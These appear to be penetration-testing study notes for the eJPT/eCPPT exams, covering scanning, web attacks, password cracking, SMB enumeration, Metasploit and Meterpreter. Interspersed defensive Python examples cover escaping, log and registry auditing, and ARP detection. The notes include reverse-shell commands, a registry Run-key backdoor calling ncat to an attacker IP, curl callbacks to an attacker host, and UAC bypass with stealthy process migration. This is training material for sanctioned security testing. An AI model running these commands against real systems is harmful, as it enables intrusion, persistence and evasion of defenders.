
eJPT/eCPPT Notes

Useful Notes for the eJPT and eCPPT exams.

Methodology

Testing Checklist

Routing

Check Routes

  • Command: route

Add Route

  • Command: ip route add <network_ip>/<cidr> via <gateway_ip> dev <network_card_name>

Start Python Server

  • Recommended to change into /tmp directory

  • Command: python -m SimpleHTTPServer 8080

  • Put things in the same directory to access them via a webpage

Web

Netcat

  • Start a connection: nc -v hack.me 80

    • Make GET request:

    • Only works for HTTP

For HTTPS use OpenSSL

  • Command: openssl s_client -connect hack.me:443

    • Use -debug, -state for more info

    • Use -quiet to remove connection info

Information Gathering

Open Source

  • Crunchbase: IT startup database, information about founders, investors, employees, buyouts, acquisitions

  • Whois Database: Owner name, address, email, technical contacts

Subdomain Enumeration

Passive Enumeration

Tools for Subdomain Enumeration

  • sublist3r:

    • Command: sublist3r -d google.com

    • Has brute force option that parses provided wordlist

  • amass:

    • Install:

    • Example: snap run amass -ip -d google.com

Footprinting & Scanning

Mapping a Network

  • fping performs a ping sweep on an IP range:

    • Commands:

  • nmap can perform ping scans with the -sn flag:

    • Command:

OS Fingerprinting

  • nmap can fingerprint OS with -O flag, use -Pn flag to skip ping:

    • Command: nmap -O -Pn <targets>

Port Scanning

  • TCP Connect Scan (open port):

    • -> SYN, <- SYN + ACK

    • -> ACK, then -> RST + ACK (closes connection)

  • Scanning Closed Port:

    • -> SYN, <- RST + ACK (port is closed)

nmap Port Scanning

  • Common Flags:

    • -sT: TCP connect scan

    • -sS: SYN scan

    • -sV: Version detection

    • -Pn: Skips ping sweep, useful if network has firewalls or blocks ICMP packets

Spotting Firewall

  • Incomplete nmap results on well-known services like a web server:

    • Example: "http?" or "tcpwrapped" means remote host closed connection without receiving data

    • Use nmap --reason to get more information on why a port is open or closed

masscan

  • Used for scanning large networks quickly, not as accurate as nmap:

    • Example:

Vulnerability Assessment

Nessus

  • Popular vulnerability scanner, uses a client & server:

    • Starts with a ping sweep and port scan, then probes each daemon and cross-checks responses with a vulnerability database

    • Prone to false positives

Installing Nessus

  • Command: dpkg -i nessus.deb

Usage

  • Commands:

  • Open web interface (may need to add security exception)

  • Setup custom policy and scan using GUI, export results

Web Attacks

Web Server Fingerprinting

  • Netcat:

    • Command: nc <target_ip> 80

    • After connecting, send a valid HTTP request:

    • Netcat only works on HTTP websites, for HTTPS use OpenSSL:

      • Command: openssl s_client -connect target.site:443

      • Example:

Automated Fingerprinting Tool httprint

  • Example: httprint -P0 -h <target_ip> -s /usr/share/httprint/signatures.txt

  • Flags:

    • -P0: Do not ping the web server

    • -h: Define host

    • -s: Define signature file

HTTP Verbs

  • GET: Used to request resource

  • POST: Used to submit HTML form data

  • HEAD: Used to grab header

  • PUT: Used to upload file to server

    • You must know the size of the file you are trying to upload

    • Example:

  • DELETE: Used to remove file from server

  • OPTIONS: Used to query web server for available HTTP verbs

Netcat

Setup nc Listener or Server

  • Command: nc -lvp 8888

  • Connect to nc listener: nc -v 127.0.0.1 8888

  • To make connection UDP: Add -u

  • Sending file over nc:

    • Command: cat tobesent.txt | nc -v 127.0.0.1 8888

  • Reverse Shell:

    • Command: nc -lvp 1337 -e /bin/bash

Dirbuster / Dirb

Dirbuster

  • GUI based directory enumerator

Dirb

  • Command line based directory enumerator

Basic Usage

  • Commands:

Common Flags

  • -a: Change the user agent so requests look like they come from a browser (see useragentstring.com)

  • -c "COOKIE: XYZ": Specifies cookie in request

  • -u "admin:password": User authentication in request

  • -H "My Header: My content": Add header into request

  • -r: Turn off recursive search (sub directories)

  • -z 1000: Changes speed to one request a second

  • -s: Silent mode: only displays items that were found

  • -X ".php,.bak": Append extensions to word list

  • -x extensions.txt: Include file with extensions

  • -o results.txt: Save results in output file

Run dirb through Proxy (Burp)

  • Command: dirb http://google.com -p http://127.0.0.1:8080

MySQL

Login to MySQL Server

  • Command:

    • -u for user

    • -p for password (no space between -p and the password)

Google Dorking

  • site: Only include results from specified host

  • intitle: Filters results based on title of page

  • inurl: Text included in URL

  • filetype: Used to search for specific file extensions .pdf, .xls

  • AND, OR, &, |: Logical operators for queries

  • -: Used to filter out words

Cross-Site Scripting (XSS)

Overview

  • Occurs when a web application uses unfiltered user input to build the output content displayed to its end users; this lets an attacker control the HTML and JavaScript code, thus attacking the application user.
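
The pattern the overview describes, as an added example (not from the original notes): the same page rendered with raw input next to the hardened version that escapes for the HTML context. The sample inputs are constructed; `html.escape` is Python's standard-library escaper, and the second pair of functions shows why attribute context needs quotes escaped as well.

```python
import html

# Constructed sample inputs standing in for the user-controlled values the notes
# list under "User Input" (form fields, GET/POST parameters, headers, cookies).
SAMPLE_INPUTS = {
    "benign": "alice",
    "script_tag": "<script>alert(1)</script>",
    "attribute_break": '" onmouseover="alert(1)',
}


def render_vulnerable(name: str) -> str:
    """Unfiltered input interpolated straight into the HTML body: the XSS pattern."""
    return f"<p>Welcome, {name}!</p>"


def render_hardened(name: str) -> str:
    """Same page, but the input is escaped for an HTML text context first."""
    return f"<p>Welcome, {html.escape(name)}!</p>"


def render_attribute_vulnerable(value: str) -> str:
    """Input placed inside a quoted attribute without escaping."""
    return f'<input name="q" value="{value}">'


def render_attribute_hardened(value: str) -> str:
    """quote=True also escapes double and single quotes, which matters in attribute context."""
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


def reflects_markup(rendered: str, payload: str) -> bool:
    """Reviewer/test check: does the payload survive into the rendered output verbatim?"""
    return payload in rendered
```

The escaped output still displays the user's text; it just can no longer close the tag or attribute it lands in. Output encoding has to match the context (HTML body, attribute, JavaScript string, URL), which is why a single "sanitize on input" filter is not enough.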

User Input

  • Any parameter coming from client side of web app such as:

    • Request headers

    • Cookies

    • Form inputs

    • POST parameters

    • GET parameters

Payloads

  • Alert that XSS is there:

  • Steal cookies:

  • Steal cookies and send them to attacker controlled site:

SQL

Example Query

  • Command:

Web App Use

  • In order for a web app to use database it must:

    • Connect to database

    • Submit query

    • Retrieve the results before the application can use them

Example SQL Injection

  • Command:

Finding Injection Points

  • Test every supplied user input used by the web app:

    • GET parameters

    • POST parameters

    • HTTP headers:

      • User-Agent

      • Cookie

      • Accept

Input SQL Injection

  • String terminators: ', "

  • Commands: SELECT, UNION

  • SQL Comments: #, --

SQL Functions

  • Commands:

More Commands

  • SELECT user(); -- displays current database user

  • SELECT substring(user(), 1, 1) = 'r'; -- returns true or false (1 or 0); effective for learning more about what the db contains

Union Based Injection

  • Commands:

SQLMap

Overview

  • Open source penetration testing tool that automates process of detecting SQL injection

  • Capable of both detecting and exploiting

  • Always recommended to test by hand first to avoid crashing DB

Basic Syntax

  • Command:

Examples

  • Command:

    • Test the id parameter of the GET request for view.php, tells sqlmap to use UNION based injection

  • To test POST request:

  • Command:

More SQLMap Syntax

  • -v3: Displays queries used

  • --users: Enumerate users

  • --dbs: See what dbs are connected

  • -D dbname --tables: Specify db and enumerate tables

  • -T <table> --columns: Grab columns from the specified table

  • -C <column1>,<column2> --dump: Dump records of the specified columns

  • --data='user=a&pass=a': POST injection, grab post info from burp-suite

Metasploit SQL Enumeration

  • Use auxiliary/scanner/mssql/mssql_login

Backdoors

Hide ncat in Windows System32 directory

Forward Shell

  • On Windows machine:

  • On attacker machine:

Reverse Shell

  • On attacker machine:

  • On Windows machine:

Persistent Backdoor

  1. Start listener on attacker machine

  2. Open regedit on Windows machine

  3. Navigate to Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

  4. Right-click and add new string value, name ncat, edit string value and add path to ncat binary along with reverse shell syntax: "C:\Windows\System32\ncat.exe <attacker_ip> <port> -e cmd.exe"

  5. Restart victim machine to activate shell
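
From the defender's side, the Run-key persistence described above is simple to audit. The following is an added example (not from the original notes): it parses output shaped like `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` and flags entries that match the pattern (netcat-family binary, `-e cmd.exe`, hard-coded IP). The sample output, the IP 203.0.113.5 and the port are constructed; the heuristics are an assumption for illustration, not a complete detection rule.

```python
import re

# Constructed output in the shape of `reg query <Run key>`: one entry per
# indented line as name, type, data. The last entry is the persistence pattern.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    VMwareTools    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
    ncat    REG_SZ    C:\Windows\System32\ncat.exe 203.0.113.5 4444 -e cmd.exe
"""

# Assumed indicator lists for the example; extend from your own inventory.
SUSPICIOUS_BINARIES = ("ncat.exe", "nc.exe", "netcat")
SHELL_EXEC_FLAGS = ("-e cmd.exe", "-e powershell", "-c cmd.exe")
IP_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


def parse_run_entries(text):
    """Split each indented entry on runs of 2+ spaces, as reg query prints them."""
    entries = []
    for line in text.splitlines():
        if not line.startswith(" "):
            continue  # key header or blank line
        parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)
        if len(parts) == 3 and parts[1].startswith("REG_"):
            entries.append({"name": parts[0], "type": parts[1], "data": parts[2]})
    return entries


def audit_run_entries(entries):
    """Return the entries whose command line matches any reverse-shell indicator."""
    findings = []
    for entry in entries:
        data = entry["data"].lower()
        reasons = []
        if any(binary in data for binary in SUSPICIOUS_BINARIES):
            reasons.append("netcat-family binary")
        if any(flag in data for flag in SHELL_EXEC_FLAGS):
            reasons.append("spawns a shell on connect (-e)")
        if IP_RE.search(data):
            reasons.append("hard-coded IP address")
        if reasons:
            findings.append({"name": entry["name"], "data": entry["data"], "reasons": reasons})
    return findings
```

The same check applies to the HKCU Run key and to RunOnce; an outbound connection from a System32 binary to a fixed address at every boot is also the signal a network monitor would see.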

Password Attacks

JohnTheRipper

  • After acquiring /etc/passwd (user accounts on a Linux system) & /etc/shadow (hashed passwords on a Linux system), John needs user and pass to be in the same file:

    • Command:

    • Brute Force:

    • To display passwords recovered by John:

    • Cracked passwords stored in file

Dictionary Attack

  • Command:

  • Good wordlist to install:

Rainbow Tables

  • Tables containing passwords that have been pre-hashed saving time and computational power.

  • Ophcrack: Rainbow table password cracking tool
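
An added example (not from the original notes) of the trade-off behind precomputed tables: hash a wordlist once, then crack by a single lookup instead of re-hashing, and why a per-user random salt makes that table useless. SHA-256 stands in here for any fast unsalted hash, and the wordlist is constructed; a true rainbow table is a space-compressed form of this hash-to-plaintext map, so the salting argument is the same.

```python
import hashlib
import os


def digest(password, salt=b""):
    """Fast unsalted hash (SHA-256 as the stand-in); the salt is prepended when given."""
    return hashlib.sha256(salt + password.encode()).hexdigest()


def build_lookup_table(wordlist):
    """Precompute hash -> plaintext once, up front; this is the expensive part."""
    return {digest(word): word for word in wordlist}


def crack(table, stored_hash):
    """Cracking is now a single dictionary hit instead of re-hashing the wordlist."""
    return table.get(stored_hash)


def hash_for_storage(password):
    """Defender side: a random per-user salt, stored next to the hash."""
    salt = os.urandom(8)
    return salt, digest(password, salt)


def verify(password, salt, stored_hash):
    """Login check recomputes with the stored salt, so the salt need not be secret."""
    return digest(password, salt) == stored_hash


# Constructed wordlist standing in for a real dictionary.
WORDLIST = ["password", "letmein", "qwerty", "dragon", "summer2020"]
```

With a 64-bit salt an attacker would need a separate table per salt value, which removes the precomputation advantage; a slow, memory-hard KDF (bcrypt, scrypt, Argon2) on top of the salt is what makes per-hash guessing expensive as well.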

Authentication Cracking

Hydra

  • Tool used for cracking network services such as HTTP, SSH, FTP, etc.

  • Syntax:

Configuring Hydra

  1. Inspect page source

  2. Figure out how credentials are being sent to server (POST)

  3. Figure out names of parameters being sent (pwd, usr)

  • Example Webpage:

    • -L: List of user names

    • -P: List of passwords

    • -f: Hydra will stop after first credential found

    • -V: Verbosity

  • Example SSH:
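
What the SSH example above looks like from the target's side, as an added example (not from the original notes): a detector that parses sshd "Failed password" lines from auth.log and flags a source that produces many failures across many usernames inside a short window. The log excerpt, hostnames, IPs and the threshold of 5 failures per 60 seconds are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed auth.log excerpt: one source hammering SSH with several
# usernames, plus one legitimate user who mistypes once and then logs in.
SAMPLE_AUTH_LOG = """\
Jan 10 12:00:01 web01 sshd[2301]: Failed password for invalid user admin from 10.0.0.5 port 51000 ssh2
Jan 10 12:00:01 web01 sshd[2302]: Failed password for invalid user test from 10.0.0.5 port 51001 ssh2
Jan 10 12:00:02 web01 sshd[2303]: Failed password for root from 10.0.0.5 port 51002 ssh2
Jan 10 12:00:02 web01 sshd[2304]: Failed password for root from 10.0.0.5 port 51003 ssh2
Jan 10 12:00:03 web01 sshd[2305]: Failed password for invalid user oracle from 10.0.0.5 port 51004 ssh2
Jan 10 12:00:03 web01 sshd[2306]: Failed password for root from 10.0.0.5 port 51005 ssh2
Jan 10 12:00:09 web01 sshd[2310]: Failed password for alice from 10.0.0.9 port 52000 ssh2
Jan 10 12:00:15 web01 sshd[2311]: Accepted password for alice from 10.0.0.9 port 52001 ssh2
"""

# syslog timestamp, host, sshd[pid], then the failure message (invalid user is optional)
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+)"
)


def parse_failures(log_text, year=2024):
    """Return (timestamp, source_ip, username) for each failed login line."""
    events = []
    for line in log_text.splitlines():
        match = FAILED_RE.match(line)
        if not match:
            continue
        ts = datetime.strptime(f"{year} {match['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, match["ip"], match["user"]))
    return events


def find_bruteforce_sources(events, window_seconds=60, threshold=5):
    """Flag any source whose failures within a sliding window reach the threshold."""
    by_ip = defaultdict(list)
    for ts, ip, user in events:
        by_ip[ip].append((ts, user))
    flagged = {}
    for ip, attempts in by_ip.items():
        attempts.sort()
        start, peak = 0, 0
        for end in range(len(attempts)):
            while attempts[end][0] - attempts[start][0] > timedelta(seconds=window_seconds):
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = {
                "failures": len(attempts),
                "peak_in_window": peak,
                "usernames": sorted({user for _, user in attempts}),
            }
    return flagged
```

The username spread is the useful second signal: a user who forgot a password fails on one account, while a wordlist run fails on many. The same counting logic applies to web login POSTs once the form's failure response is identified, which is exactly the inspection step listed under "Configuring Hydra".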

Windows Shares

UNC or Universal Naming Convention Paths

  • \\servername\ShareName\file.net

Administrative Shares

  • \\ComputerName\C$: Lets admin access volume on local machine

  • \\ComputerName\admin$: Points to the Windows installation directory

  • \\ComputerName\ipc$: Used for interprocess communication

Null Sessions

  • An anonymous connection to an inter-process communication network service on Windows-based computers:

    1. Check and see if the target has any file server enabled

    2. nbtstat -A 10.123.162.2 or nbtstat /? for help

    3. The third line down will tell you if the target is sharing any files in the <> field

    4. If file server is enabled, enumerate shares with NET VIEW

    5. NET VIEW <target_ip>

    6. Try to connect to share

    7. NET USE \\<target_ip>\IPC$ '' /u:'' (connect to the IPC$ share without authentication)

  • enum:

    • Script that automates enumeration of shares

    • Commands:

  • winfo:

    • Another enumeration tool

    • Command:

Linux Version

  1. nmblookup -A <target_ip>

  2. smbclient -L \\:<target_ip> -N

  • Use instead: smbclient -L <WORKGROUP> -I <TARGET_IP> -N -U "" (allows you to see services on target, -N forces no password)

  3. smbclient //<target_ip>/IPC$ -N

  • Use instead: smbclient \\\\<target_ip>\\<target_share> -N (connects to IPC share without authentication)

Enumeration Scripts

  • enum4linux script:

    • Enumerates shares

    • Brute force enumeration:

  • samrdump.py:

    • Enumerates info about users using null sessions

    • Command:

  • nmap smb enumeration:

    • Commands:

ARP Poisoning

  • Works by changing the ARP caches on two network nodes. Attacker sends unsolicited ARP packets to the two nodes telling them to route traffic through the attacker computer.
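
Because the attack works by making two hosts accept unsolicited ARP replies, the defender's signal is an IP whose MAC suddenly changes, or one MAC claiming several IPs. The following is an added example (not from the original notes) of that check run over a constructed stream of ARP replies such as a Wireshark export would give; the addresses and the static gateway mapping are made up.

```python
from collections import defaultdict

# Constructed ARP reply stream as (timestamp, sender IP, sender MAC). The fourth
# record is the moment the gateway's IP starts being claimed by another MAC.
SAMPLE_ARP_REPLIES = [
    (1.0, "10.0.0.1", "aa:aa:aa:aa:aa:01"),
    (1.5, "10.0.0.20", "bb:bb:bb:bb:bb:20"),
    (2.0, "10.0.0.21", "bb:bb:bb:bb:bb:21"),
    (30.0, "10.0.0.1", "cc:cc:cc:cc:cc:99"),
    (30.1, "10.0.0.20", "cc:cc:cc:cc:cc:99"),
]

# Known-good mappings from inventory (assumed), e.g. the default gateway.
KNOWN_STATIC = {"10.0.0.1": "aa:aa:aa:aa:aa:01"}


def detect_arp_anomalies(replies, known_static=KNOWN_STATIC):
    """Walk the replies in order and emit an alert for each poisoning indicator."""
    observed = {}                 # ip -> last MAC seen claiming it
    ips_per_mac = defaultdict(set)  # mac -> every IP it has claimed
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        # 1. A reply contradicting a pinned mapping is the strongest signal.
        if ip in known_static and known_static[ip] != mac:
            alerts.append({"ts": ts, "kind": "static_mismatch", "ip": ip, "mac": mac})
        # 2. An IP changing MAC mid-capture (what the victims' caches just did).
        previous = observed.get(ip)
        if previous is not None and previous != mac:
            alerts.append({"ts": ts, "kind": "mac_changed", "ip": ip, "old": previous, "new": mac})
        observed[ip] = mac
        # 3. One interface claiming several IPs: the attacker speaking for both victims.
        ips_per_mac[mac].add(ip)
        if len(ips_per_mac[mac]) > 1:
            alerts.append({"ts": ts, "kind": "mac_claims_multiple_ips",
                           "mac": mac, "ips": sorted(ips_per_mac[mac])})
    return alerts
```

Pinned static entries (or dynamic ARP inspection on the switch) stop the poisoning rather than just detecting it. DHCP reassignments and failover setups such as VRRP legitimately move an IP between MACs, so the second and third checks need an allowlist in practice.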

Enable Packet Forwarding

  • Command:

Dsniff

  • Tool used for ARP poisoning:

    • Example:

      • -i: NIC

      • -t & -r: Victims

  • You can then run Wireshark to see the traffic

Metasploit

Framework for Exploiting Machines

Requirements Before Use

  • Commands:

Start

  • Command: msfconsole

Help

  • Command: show -h

  • Command: search <search_term>

Show All Exploits

  • Command: show exploits

Use Exploit

  • Command: use exploit/windows/ftp/turboftp_port

Go "Back"

  • Command: back

Get Info About Exploit

  • Command: info

See Exploit Options

  • Command: options

Configure Exploit Parameters

  • Command: set

See Available Payloads

  • Command: show payloads

Set Payload

  • Command:

Launch Exploit/Payload

  • Command: exploit

Create Listener

  • Commands:

Upgrade to Meterpreter

  • Commands:

Scan for SMB Vulnerabilities with nmap

  • Command:

Meterpreter

Advanced Shell

Search for Meterpreter Payloads

  • Command: search meterpreter

Put Session in Background

  • Command: background

List Current Sessions

  • Command: sessions -l

Resume Session

  • Command: sessions -i 1

Get Info About Machine

  • Command: sysinfo

Network Info

  • Command: ifconfig

Routing Tables

  • Command: route

Get Current User ID

  • Command: getuid

Elevate Privilege

  • Command: getsystem

    • If operation fails, try the following:

      1. Background session

      2. Search bypassuac

      3. Use exploit/windows/local/bypassuac

      4. Set session

      5. Exploit

Uploading/Downloading Files

  • Command: upload <path> or download <path>

Use Standard OS Shell

  • Command: shell

See All Processes Running

  • Command: ps

See Process Meterpreter is Attached to

  • Command: getpid

Check UAC

  • Command: run post/windows/gather/win_privs

Migrating Process to be Stealthy

  • When migrating process, the new process must have the same level of privilege:

    • Command: ps -U SYSTEM

    • This command will search for all other processes with system-level privilege:

      • Command: migrate <pid>

Remote Code Execution (RCE)

Blind RCE

  • Test bash sleep command to see if page is delayed:

    • Command: sleep 5

Testing Network Connectivity

  • Use Wireshark to pick up ICMP packets:

    • Command: ping <attacker> -c 5

    • May need to use URL encoding to keep syntax intact

Testing Webshell

Get Paths to Installed Programs

  • Command: echo $PATH

Look for Specific Tools

  • Command: which <tool>

Curl

See if You Can Establish TCP Connection

  • On Attacker:

    • Setup listener with nc: nc -lvp 53

  • On Target:

    • Establish TCP with curl: curl http://<attacker_ip>:<attacker_port>

Test Commands with Curl

  • Commands:

Test Commands with Spaces in the Output with Curl

  • Commands:

    • The command above will not display properly when the output contains spaces; encode it to see the full output:

      • Command:

    • To decode:

      • Command:

Downloading Files with Curl

  • Command:

Uploading Files

  1. Start simple Python HTTP server:

  • Command:

  • All files in directory you start Python server in will be available via server

  2. Generate payload & store it in server directory:

  • Command:

  3. Get payload on victim machine:

  • Command:

  4. Test if file was uploaded by downloading it:

  • Command:

  5. Running payload:

  • Command:

  6. Spawning a Better Shell:

  • Command:

  • Spawns bash environment

  • There are lots of shells you can easily spawn, look them up ("spawning tty shell"):

    • Command:

Pivoting with Meterpreter

  • Command:
